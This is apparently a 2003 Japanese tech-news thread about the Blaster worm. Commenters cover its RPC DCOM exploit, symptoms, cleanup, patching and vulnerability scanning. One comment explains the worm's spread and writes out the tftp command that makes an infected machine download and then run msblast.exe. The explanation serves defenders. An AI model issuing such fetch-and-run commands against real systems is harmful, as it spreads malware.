WindowsUpdateに攻撃するワーム 220
ストーリー by wakatono
ええかげんにせぇ 部門より
ええかげんにせぇ 部門より
Anonymous Coward曰く、"CNNの記事によるとマイクロソフトが運営するWindowsUpdate.comを攻撃するウイルスのようなものが(現地の)先週の土曜日から猛烈な勢いで増殖しているらしい。 CNNの記事によると、ワームには「なぜビルゲイツはこんなことを可能しているのか?金を稼ぐのをやめてソフトウェアの修正をしろ」というメッセージが埋められているらしい。"
埋められているメッセージは、"I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!"ちうもの。正体はW32.Blaster.Worm。既知のRPCのセキュリティホールをつくワームだが、WindowsUpdateをまめにかけてたり各ウィルススキャナベンダのパターンファイルを最新にしておいたりということで予防/対処はできるようだ。主張してる内容はともかく、訴える手段としては最悪だ。なんでこういう手段に出るかなぁ…
目的とか手段とか (スコア:2, すばらしい洞察)
作ったワームをばら撒く為に大義名分を考えたんじゃなかろうか・・・
Re:目的とか手段とか (スコア:1)
もとからセキュリティに危機意識のある人に注意を喚起しても啓蒙にはなりませんな。
取り敢えず,日本語で (スコア:2, すばらしい洞察)
このニュース,「イメージ的」にヤバいかもね。
「WinUpdate 掛けるとウィルスに感染する」なんて
誤解した初心者が増えたりして・・・
Re:ゲーツです。 (スコア:1, おもしろおかしい)
>ビル・ゲイツ君、なぜこんなことを可能にさせているんだ?金もうけをやめて、ソフトウエアの修正をしろ!」
毎週のようにパッチを出して修正している努力がみえんのですか!
#キャラ選択を間違えてのでAC
謎だな、このパッチって windowsupdate を攻撃しない為って事は反逆者を防止するプログラムってことですね。
反逆者は強制収容所へ連行され思想教育....これまたプログラムを視覚化できればきっとこうなっていると、
#今週はワームとパスポートの欠陥と敗訴の3本だてか、
#ウンガッウンと何かを詰まらせて青くなっているのでAC
かかったかなと思ったら (スコア:2, 参考になる)
某所で確認できた、こやつにヤラレた場合の症状:
・Office製品が今までにない変な挙動(DCOMなんたらとかいうエラーメッセージを表示する)を起こす。
・コピー&ペーストができない。
#ソフトを修正しろと言うだけ言っといて、ソフトの修正モジュールを配布するサイトを攻撃してる「夏だなぁ」な奴が暗躍する今日この頃。皆様いかがお過ごしでしょうか。
Re:かかったかなと思ったら (スコア:2, おもしろおかしい)
ファイアーウォール内なのに・・・
蚊帳の中に入ってきた蚊に刺されまくった感じ・・・
Re:かかったかなと思ったら (スコア:1)
感染したPCを持ち込む馬鹿や、勝手に外への口をあける
馬鹿やら結構いますね。
>蚊帳の中に入ってきた蚊に刺されまくった感じ・・・
子供じゃないんだけど、会社で持ち物検査とかした方がええのでは?
と思うこともありますね。
Re:かかったかなと思ったら (スコア:1)
>ネットワークに弱いってのが玉に傷...
ネットワークにつなげておかないで、毎日FD&MOでデータを
吸い上げて、表計算用データに変換するというシステムも、
なぜか週一のrebootが必要だとかいうこともあって....
一週間以上動かすとまずいOSという認識が今でも抜けない>Win
# DOSでやっていた時は不意の停電があっても大丈夫だったのになぁ
釣りでは無いと思う (スコア:2, すばらしい洞察)
さすがにガリガリ忙しい時に停電があったらマズいですが…と言うものの、メモリ少ないからキャッシュなんて無いに等しい(多少の「バッファ」はありましたけどね)し、シングルタスクなのでバックグラウンドで遅延書き込みなんて機能はアプリ側で対応していなきゃ無いので、書き込み途中で停電が発生しても次回から起動しなかったり、システム全体が吹っ飛んだりするような損傷は余程運が悪くない限り発生しなかったと思います。
Re:かかったかなと思ったら (スコア:1)
で、何か?
# あまりに違うものを並べて、「自転車のパンク」と大型トラック
# やレースカーもパンクするからとかぬかして、何か意味あると
# 思っているのかな?さすが、Anonymous Cowardという類例が増える
# だけだね。
Re:釣りでは無いと思う (スコア:1)
SCSI 以降なら問題ないはず。
Re:かかったかなと思ったら (スコア:1)
♪かかずにパッチ [yamanouchi.com]
Re:かかったかなと思ったら (スコア:1)
出るみたいです。
目の前で見ちまったし、自分のがやられた時間あたりに出ていたと
イベントログにも残ってました。
(2台やられて両方に残っていた)
Re:かかったかなと思ったら (スコア:2, 参考になる)
svchosが死ぬのはネットワーク経由で攻撃受けているからなので、ネットワークから外せばとりあえず、再起動&エラーは出ない。はず。
んで、その状態で、プロセス殺して、レジストリ直して、パッチ当てて、再起動、綺麗に駆除。
で大丈夫だと思うけど。
Re:かかったかなと思ったら (スコア:1)
XPは再立上げ後、感染源と変化していました^^;
2kの方は、ウィルスバスターがTFTPでダウンロードされた
ファイルをMSBLAST.EXEにコピーする段階で捕まえてくれ
て、被害はありませんでした。
復旧もその手順ですね。
タスクマネージャでプロセスをを開いて見れば、
MSBLAST.EXEそのまんまの名前で実行されているので、
もしやと思う人はチェックをするとよいかもしれません。
Re:かかったかなと思ったら (スコア:1)
やっぱり
「ピンポーン!」あるいは「ポンピィ~!」でしょ。
(使用例)
枕: かかったかなと思ったら
本文:xxxxxxxxxxx
xxxxxxxxxxx
〆: ポンピィ~
−・・ ・ ・ −・−・ ・・・・ −−−
手垢で汚れた少年漫画とソースの香りがいい感じ
おふとぴ (スコア:1)
Re:かかったかなと思ったら (スコア:1)
--- (´-`)。oO(平和な日常は私を鈍くする) ---
パッチをあてても感染...? (スコア:2, 興味深い)
パッチが当たっているのはレジストリで確認しました.
毎週2回WindowsUpdate見に行く習慣が付いていましたので..
にもかかわらず,感染しました.
60秒後にシャットダウンというメッセージに思わず笑いました.
# 笑うしかありませんって...
...私だけ?
そうじゃないだろう!
DCOM を無効にする方法 (スコア:2, 参考になる)
ストーリ全部を読んだんですが↑へのリンクが掲載されてないようなので、掲げておきます。
「ネットワークに繋ぐとシャットダウンされる」ような場合に、オフラインでDCOMを無効にしてから、ネットワークにつなぎ、WindowsUpdateをかける、という手順になります。
/.効果を軽減するため、引用しておきます。
別の事情で丸一日…(余計なもの) (スコア:2, 参考になる)
TVニュースで元記事の話を知り、まずWebで事情を確認。
(http://www.zdnet.co.jp/enterprise/0308/12/epn07.html)
次にバックアップのために取っておいたパッチ(MS03-026)の存在を確認。
「すでに当ててたんだ…よし。」
それからウィルススキャンを使用(つい先日データベースを更新)。
「ウィルスの類は確認されず…よし。」
巷ではネットが混雑気味だという。
それを横目に、
「う~ん、我ながらなんて悪運の強い。やはり日頃の行いが…」
と思いつつ、スパイウェアのチェックと削除。
これで/.Jに自慢話の一つでも書き込むハズだった。(ぉぃ)
しかし、一部が削除されず。
あせった。
セーフモードにしても削除できない。
何回再起動&駆除プログラム作動をさせたか、今となっては憶えていない。
再インストールの誘惑が襲ってくる。
盂蘭盆の時期でもあって年一回の墓参りの後、「スパイウェア」と「削除不能」で検索。
あっさりと、関連サイトを発見。
(http://higaitaisaku.web.infoseek.co.jp/index.html)
#少々、オフトピック気味になってきた…
そのサイトで、削除が困難で有名な「CnsMin」だったことを知り、唖然とする。
それから約一時間後にようやく削除完了。
その時すでに日は暮れていた。
「ウィルス」や「ワーム」ではなく、「スパイウェア」の駆除で今日丸一日つぶしてしまって、我ながら情けなくなってしまった。
やっぱり日頃の行いが…
#バカなやつだと笑い飛ばしてやってくれい。(T^T)
#どうせ自室は連日摂氏30度(エアコン無し)、
#おまけにMorganの(ファン越しでの)熱い吐息もあって、
#しばらく書き込む気力さえ起きんかった。
こちらの攻撃も効いているようです。 (スコア:1, 参考になる)
マイクロソフトの『パスポート』にまたもや欠陥 [hotwired.co.jp]
続き、ここで話が繋がる [cnn.co.jp]と
他とは違った機能を一般化しないと存在意義が薄れる。よってMSテクノロジーは廃止できない。
既に枯れた技術のため一つの穴から他の穴へ応用する時間が速く小さな傷が致命的
これが延々繰り替えされて未だにセキュアなOSにならない。
アレゲな機能を切り捨ての他社へシェアを譲る気持ちであれば当然セキュアなOSになるだろうがそうなると
Windows事態意味を持たなくなる可能性がある。このジレンマでしょうね。
#シェアの取れないWindowshはクリープのないこーしー(ヒ)と同じさ
またやっちまった (スコア:1)
それにしても社内のPCはサーバ以外プライベートアドレスのはず
なのに感染したマシンはプライベートアドレス!!!
感染経路の特定が終わらないのでまだ会社でお仕事中
だれや(怒)勝手にネットワークにPC繋げてワームをばら撒いた
奴は
Re:またやっちまった (スコア:3, 参考になる)
http://www.isskk.co.jp/security_center/147/ms03-026rpc.html
> このツールは、MS03-026 RPC DCOMに関する脆弱性を持つ可能性の
> あるホストを見つけ出すためのツールです。
(中略)
> このツールは、コマンドラインツールです。検査結果をIPアドレスのリストとして、
> 標準出力へ出力します。検査結果は以下のように表示されます。
>
以下Slashcodeの投稿フィルタ?に引っかかったため、全角に変換。
> --------------------------------------------------
> C:¥>scanms.exe 192.168.0.1-192.168.0.254
> 192.168.0.2 [Windows XP] [ptch] [ptch] 5.6
> 192.168.0.5 [unknown010] [????] [VULN] 0.0
> 192.168.0.10 [Windows XP] [ptch] [ptch] 5.6
> 192.168.0.55 [Windows XP] [ptch] [ptch] 5.6
> --------------------------------------------------
>
> IP 192.168.0.5は、適切なパッチがおこなわれていません。
> リスト上にないホストは、Port 135を使ったアクセスが出来ない
> ホストです。出力カラムの[ptch] [VULN], [???]の部分、
> それぞれふたつの異なる手法による検査結果を表しています。
>
I'm out of my mind, but feel free to leave a comment.
Re:またやっちまった (スコア:1)
# しかしすごいね。自宅のルータのログはポート
# 135 への接続で溢れかえってるよ。
(´д`;)
Re:またやっちまった (スコア:2, 参考になる)
なんつて。
もう大丈夫だろうと思って解放した途端にまた広まる予感。
(´д`;)
感染してなくても迷惑 (スコア:1)
どうやらすでに攻撃が効いているみたいです。これでサービス停止とかになったらそれこそどうする状態です。まあMicrosoftはすぐに参照先変えて対処するでしょうけど、対策パッチを当てられない状況にしようとしているという意味で非常にタチの悪いワームだと思います。
Re:感染してなくても迷惑 (スコア:1)
一応、指摘しておきます。8月以降(9月から)または15日以降(16日から)にDoS攻撃が始まるので、今はまだDoSは始まっていません。時計があっていないPCもあるけど、今は慌ててパッチをDownloadしようとしている人々で混んでいるのだと思われます。
Re:感染してなくても迷惑 (スコア:1, おもしろおかしい)
なるほど、すでにDDoSアタックが発生してるということですね。
#台風の時に限ってtenki.jpがみれなくなるのでAC
Re:以降(オフトピ) (スコア:1, 参考になる)
今回の事例で言えば含まないです (mon>8||day>15 です)。
> 「以上」とかの定義を敷衍して、含むと思い込んで、
> 「『8月以降』ならもう攻撃開始してるやんけ、矛盾してるなあ」と思ってました。
日本語の「以降」は以下の2つの解釈が可能ですね
1. 「以上」と同様。その時を含む (夜の8時以降の一人歩き禁止)
2. 「超過」と同様。その時を含まず (今回の8月以降のようなもの)
> プログラマとしてはこういう境界問題はバグの温床なので、
> 詳しい定義 (そんなのはない、としても) をしりたいです。
普通の人達が両方の意味で使うので、
正確さを要する場面で「以降」を使わないのが正解でしょう。
もしどうしても使いたいならば「9月およびそれ以降」です。
これなら比較的自然な表現ですし
「以上」と「超過」のいずれの解釈をされても意味は同じになります。
プログラミングに関する場面であれば
「月の値が9以上」「月の値が8超過」「hourの値が8以上」
というロボット的表現が美しいでしょう。
日常会話でそういう表現を自然に使えるようになればセキュアなプログラマーです。
日本語の「未満」「以下」「等しい」「以上」「超過」
に関しては、それぞれ "<" "<=" "==" "=>" ">" という演算子に
割り当てられることが明確になり、
日本語としてそのあたりの調整は成功したと言えるでしょう。
しかしそれに類する言葉「以前」「以後」「以降」などは
明確な定義に失敗しています。
この手の言葉は可能な限り使わない方が安心です。
似たような問題を抱える言葉に「前」があります。
「前の画面に戻る」「次の画面に進む」
「後ろに戻る。後退する」「前に進む。前進する」
おおよそ時を現す場合の「前」は時間の値がマイナス、
位置を現す場合の「前」は位置の値がプラスです。
この問題も「前」という言葉を使用中止し、他の言葉で置き換えれば問題解決します。
Re:感染してなくても迷惑 (スコア:1, 興味深い)
↓
やってる途中に強制シャットダウン
↓
またwindowsupdate
↓
またシャットダウン
↓
以下くり返し
って感じでいつもより多く混んでる感じ。
うちも掛かってしまい、パッチすら落とせない状況になったんで、win98でパッチ取って来てなんとかなったよ。めんどくせー。
一応パッチ
http://support.microsoft.com/default.aspx?scid=kb;ja;823980 [microsoft.com]
マッチポンプ・・・ (スコア:1, おもしろおかしい)
つーか、早すぎねぇ?
どうしても疑っちまうなぁ。
Re:マッチポンプ・・・ (スコア:3, 参考になる)
時間順にニュースを追いかけてみます。
だいたい7月26日の時点で、最終的にはワームが作られるのは予想できていた訳で、普通はその時から準備をしているものです。それにこの流れを追ってきていれば、今回のワームへの対応は当然のことです。ポートを監視していれば、ウイルスは拾えるし、7月26日からちゃんと予習していれば、コードのサイズは小さいのですぐに解析できると思います。
Re:マッチポンプ・・・ (スコア:1, すばらしい洞察)
> つーか、早すぎねぇ?
何時間なら対応早いとか早すぎになるとかいう判断基準を持っているのですか?
進化能力のない小型の病原体ですので、
本体入手してから hex dumpを適当に眺めていれば
パターンマッチングのデータ作るのはあっという間でしょう。
しかも今回のは脆弱性を突き破るために仕組まれたパケットデータが
内蔵されており、その部分は特徴的過ぎるため
曖昧なパターンによる心配もする必要ない。
しかも、ワクチン産業に従事している技術屋連中なら
この手の小型病原体のアセンブラコードを数時間読めば
動作の概要を説明する仕様書起こせますよ。
特に今回のは読みにくくするためのトリックはなさそうだし。
審判の日キタ━━━━━━━━(゜∀゜)━━━━━━━ (スコア:1, おもしろおかしい)
SkyNET=WIN
Server系はどうなの? (スコア:1)
RPCが落ちた時も回復動作が「何もしない」になっている為
コピペが出来ない等の諸症状こそ出るもののリブートはせず。
とりあえずパッチ宛に奔走しているもののなんだか気持ち悪い印象が残っています。
他にServer系で感染した報告ある人居ましたら情報下さい。
Re:Server系はどうなの? (スコア:1)
RPCの脆弱性を利用する他のワームやトロージャンに殺られたという可能性が高いです。他のワームやトロージャンなので、いくら探してもmsblast.exeは見つかりません。
もしもこのワームと仮定するならば、tftpによる転送の手順 [srad.jp]を見て下さい。そこで言う、ポート135の第一波は到達したけど、ポート4444の第二波が何らかの理由で到達しなかったかポート4444が開く前に到達したため、RPCがポート4444で待機状態になっていると思われます。そのためRPCに関するエラーは発生するけど、ワームは存在しないのかと思われます。
windowsupdate.com (スコア:1)
#意味あるかなぁ。
Re:普段の行いのせい? (スコア:1)
今日もその*普段*のWindowsUpdateをしようとしたら、やたら重かったです。
18日の (スコア:1)
…の事を考えただけで、「仮病を使(略)」というフレーズが脳裏を巡るシステム管理人でありました(TT)
#はぁ~~~盆休みなのに鬱
@大阪なヒト
Re:普段の行いのせい? (スコア:1)
(´д`;)
Re:普段の行いのせい? (スコア:1)
家庭内LAN内にある各種マシンも大丈夫のようです。
しかし、システムのコンパネにある、アプリケーションの追加削除には
SP2に纏められると思われるパッチが24個ほど存在しております。
早く、SP2出ないですかなぁ。<Win xp
SP1は既に適用済みですけど、DirectX9bやその他
エクスプローラーのバグとか任意のパッチを合わせると
実際常用するソフトの数より多くなると言う状態です。
お陰で適用すべきパッチがどれか、一瞬パッチNoで混乱したり。
(7月17日分で適用していたNoが存在)
最初、WinUpdateでは、「あなたのシステムに当てるべき
パッチはありません」と表示され、ちょっとビビりましたが
(要らないWin追加モジュールはインストしてませんけど)
直に該当パッチプログラムを落とす事になりました。
Re:犯人の言い分 (スコア:2, すばらしい洞察)
犯罪者だから、テロリストだから、という理由でその主張を隠蔽することも危険な行為ではないでしょうか。
「こんなのあとづけの理由でただ攻撃したかったんだろ」というような判断も、実際の言い分を聞いた上でないと、見当違いな判断になってしまうかもしれません。
また、今回の件がそうだとは僕も思いませんが、犯罪者やテロリストだからもう全然悪、というのは思考停止ではないかな。
彼らに一面の真理はないのだろうか、ばっさりと断罪できるのだろうか、法律はこうなっているけれど、そもそもその法律自体に問題はないのだろうか。とういう議論ができればいいような気がします。
「大本営発表」ならいいわけでもないわけですし。
Re:犯人の言い分 (スコア:1)
情報が含まれていることを恐れているためだと思っていましたが、
違うのでしょうか。
犯行声明を聞いて納得して応援する人なんてあまりいないでしょう。
# せいぜい、「気持ちはわかるがやったことは悪い」ぐらいにしか
# 思われないし。
Re:だいじょうぶ? (スコア:1)
> ワームは自身のTFTPサーバ機能を持っており、感染元コンピュータのポート69番を使用してTFTPサーバとして機能します。
だそうなので、msblast.exe自体がtftpサーバで、バックドアを開けてから、自分自身をtftpを使って送りつける、ということではないでしょうか?
# まちがってたら訂正お願いします。
tftpによる転送の手順 (スコア:2, 参考になる)
まず、第一波として感染PCからポート135に攻撃が着ます。RPCの脆弱性がある場合、ワームのコードが実行されポート4444が開かれます。そして第二波として感染PCからポート4444に
tftp -i IPアドレス GET msblast.exe
というテキストデータが着ます。で、最初の第一波のコードがこれをcmd.exeで実行させます。IPアドレスというのは感染して今ワームのコードを送ってきているPCのIPアドレスです。その感染PCではmsblast.exeが動いていて、ポート69で待機しています。tftpが終了するか約20秒経過すると
start msblast.exe
msblast.exe
がポート4444に着ます。そこでDownloadされたmsblast.exeが実行されます。それで今度は自分が感染PCになるわけです。
第一波でポート4444が開く前に第二波が着てしまった場合とか、tftpによるmsblast.exeのDownloadが終了する前に約20秒経ってしまったときには失敗します。
Re:田代砲 (スコア:1)
ワームが攻撃するのは「windowsupdate.com」です。
Re:田代砲 (スコア:1)
http://windowsupdate.microsoft.com
から
http://v4.windowsupdate.microsoft.com/
にフォワードされるから、あるんじゃないの?
Automatic Updateもデフォルトは、
http://windowsupdate.microsoft.com/
じゃなかったかな・・・。
Re:AVG Anti-Virus フリー版 (スコア:1)
このストーリー読んでたら不安になってしまったので、その T 社のオンラインスキャンを使おうとしたのですが、設定ファイルが、トラフィックがどうのこうのでダウンロードエラーとかで実行できませんでした。なので現在 S 社のオンラインスキャンでチェックしてます (こっちは問題なく動いてる。。。さすが)。
# ていうか、チェック中の段階で、既に感染ファイルが 8 個も見付かってるんですけど (T-T)/
むらちより/あい/をこめて。
Re:亜種情報 (スコア:1)
やっぱ夏休みの自由研究として世界中で増えそうだな。
# 工作員の自由研究として発表して革命的発明と言われて
# 将軍樣から表彰されたりしてたらどうしよう。
(´д`;)